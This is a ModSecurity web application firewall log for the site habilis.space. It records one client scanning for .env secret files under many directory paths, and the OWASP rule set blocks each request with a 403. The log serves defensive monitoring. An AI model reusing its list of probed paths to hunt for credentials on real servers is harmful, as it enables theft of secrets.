[Mon May 11 17:33:35.230234 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/public/.env"] [unique_id "agH2zzJnyuKVXoStDhbM0wAAAEs"]
[Mon May 11 17:33:35.230461 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zzJnyuKVXoStDhbM0wAAAEs"]
[Mon May 11 17:33:35.349569 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/admin/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1AAAAEs"]
[Mon May 11 17:33:35.349790 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/admin/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1AAAAEs"]
[Mon May 11 17:33:35.350049 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zzJnyuKVXoStDhbM1AAAAEs"]
[Mon May 11 17:33:35.465482 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/backend/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1QAAAEs"]
[Mon May 11 17:33:35.465703 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/backend/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1QAAAEs"]
[Mon May 11 17:33:35.465934 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zzJnyuKVXoStDhbM1QAAAEs"]
[Mon May 11 17:33:35.581005 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/server/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1gAAAEs"]
[Mon May 11 17:33:35.581260 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/server/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1gAAAEs"]
[Mon May 11 17:33:35.581522 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zzJnyuKVXoStDhbM1gAAAEs"]
[Mon May 11 17:33:35.695686 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/frontend/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1wAAAEs"]
[Mon May 11 17:33:35.695911 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/frontend/.env"] [unique_id "agH2zzJnyuKVXoStDhbM1wAAAEs"]
[Mon May 11 17:33:35.696122 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zzJnyuKVXoStDhbM1wAAAEs"]
[Mon May 11 17:33:36.015550 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/src/.env"] [unique_id "agH20DJnyuKVXoStDhbM2AAAAEs"]
[Mon May 11 17:33:36.015779 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/src/.env"] [unique_id "agH20DJnyuKVXoStDhbM2AAAAEs"]
[Mon May 11 17:33:36.016002 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM2AAAAEs"]
[Mon May 11 17:33:36.130856 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/core/.env"] [unique_id "agH20DJnyuKVXoStDhbM2QAAAEs"]
[Mon May 11 17:33:36.131075 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/core/.env"] [unique_id "agH20DJnyuKVXoStDhbM2QAAAEs"]
[Mon May 11 17:33:36.131297 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM2QAAAEs"]
[Mon May 11 17:33:36.245078 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/core/app/.env"] [unique_id "agH20DJnyuKVXoStDhbM2wAAAEs"]
[Mon May 11 17:33:36.245317 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/core/app/.env"] [unique_id "agH20DJnyuKVXoStDhbM2wAAAEs"]
[Mon May 11 17:33:36.245545 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM2wAAAEs"]
[Mon May 11 17:33:36.360338 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/config/.env"] [unique_id "agH20DJnyuKVXoStDhbM3AAAAEs"]
[Mon May 11 17:33:36.360552 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/config/.env"] [unique_id "agH20DJnyuKVXoStDhbM3AAAAEs"]
[Mon May 11 17:33:36.360750 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM3AAAAEs"]
[Mon May 11 17:33:36.493749 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/private/.env"] [unique_id "agH20DJnyuKVXoStDhbM3QAAAEs"]
[Mon May 11 17:33:36.493972 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/private/.env"] [unique_id "agH20DJnyuKVXoStDhbM3QAAAEs"]
[Mon May 11 17:33:36.494196 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM3QAAAEs"]
[Mon May 11 17:33:36.607895 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/application/.env"] [unique_id "agH20DJnyuKVXoStDhbM3gAAAEs"]
[Mon May 11 17:33:36.608115 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/application/.env"] [unique_id "agH20DJnyuKVXoStDhbM3gAAAEs"]
[Mon May 11 17:33:36.608339 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM3gAAAEs"]
[Mon May 11 17:33:36.724408 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/bootstrap/.env"] [unique_id "agH20DJnyuKVXoStDhbM3wAAAEs"]
[Mon May 11 17:33:36.724623 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/bootstrap/.env"] [unique_id "agH20DJnyuKVXoStDhbM3wAAAEs"]
[Mon May 11 17:33:36.724841 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20DJnyuKVXoStDhbM3wAAAEs"]
[Mon May 11 17:33:37.063600 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/database/.env"] [unique_id "agH20TJnyuKVXoStDhbM4AAAAEs"]
[Mon May 11 17:33:37.063833 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/database/.env"] [unique_id "agH20TJnyuKVXoStDhbM4AAAAEs"]
[Mon May 11 17:33:37.064054 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM4AAAAEs"]
[Mon May 11 17:33:37.178021 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/storage/.env"] [unique_id "agH20TJnyuKVXoStDhbM4gAAAEs"]
[Mon May 11 17:33:37.178254 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/storage/.env"] [unique_id "agH20TJnyuKVXoStDhbM4gAAAEs"]
[Mon May 11 17:33:37.178477 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM4gAAAEs"]
